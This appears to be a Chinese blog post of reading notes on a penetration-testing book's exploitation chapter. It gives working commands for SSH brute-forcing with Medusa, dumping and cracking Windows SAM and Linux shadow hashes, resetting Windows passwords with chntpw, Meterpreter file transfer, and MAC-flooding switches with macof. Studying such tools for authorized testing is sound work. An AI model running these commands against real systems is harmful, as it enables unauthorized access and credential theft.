《渗透测试实践指南》读书笔记之漏洞利用

远程密码破解:Medusa,Hydra

medusa -h target_ip -U user_list -P pass_dict -M service_to_attack
如:medusa -h 192.168.1.10 -u ownedb -P /pentest/passwords/wordlists/darkc0de.lst -M ssh

Meterpreter shell

migrate:迁移进程
download:从目标下载文件或文件夹
upload:上传文件到目标系统

密码破解:John the Ripper

破解SAM(需要system和SAM文件)
光盘启动bt,挂在windows系统盘,进入windows/system32/config目录
获取密码的hash:samdump2 system SAM > /tmp/hashes.txt
cd /pentest/passwords/jtr
./john /tmp/hashes.txt -f:NT

破解Linux shadow
cd /pentest/passwords/jtr
./unshadow /etc/passwd /etc/shadow > /tmp/linux_hashes.txt
./john /tmp/linux_hashes.txt

密码重置:chntpw

光盘启动bt,挂在windows系统盘
cd /pentest/passwords/jtr
交互式重置:./chntpw -i /mnt/sda1/windows/system32/config/SAM
根据提示一步步走就行了

网络嗅探

集线器(hub),将网络数据包发送给连接到该hub的所有计算机,各计算机的网卡来判断接收还是丢弃;
交换机(switch):维持着MAC地址和交换机端口的匹配表,分别将包含不同目的地址的网络包发往不同的端口;
泛洪攻击交换机:大多数交换机存储匹配表的容量是非常有限的,通过耗尽内存,并用大量伪造的MAC地址泛洪该匹配表,就可以使交换机无法访问这个匹配表。由于此时交换机无法根据MAC地址匹配出正确的端口,因此就会简单地把流量广播到所有端口,这种模式成为失效开放(fail open)。一些交换机被设置为失效关闭(fail close),在失效时会停止数据包的传送,这样就等同于DOS攻击。
嗅探网络流量的工具集:Dsniff,其中有个工具macof,可以对交换机进行泛洪攻击;
macof -i eth0 -s source_ip -d target_ip

你可能感兴趣的:(《渗透测试实践指南》读书笔记之漏洞利用)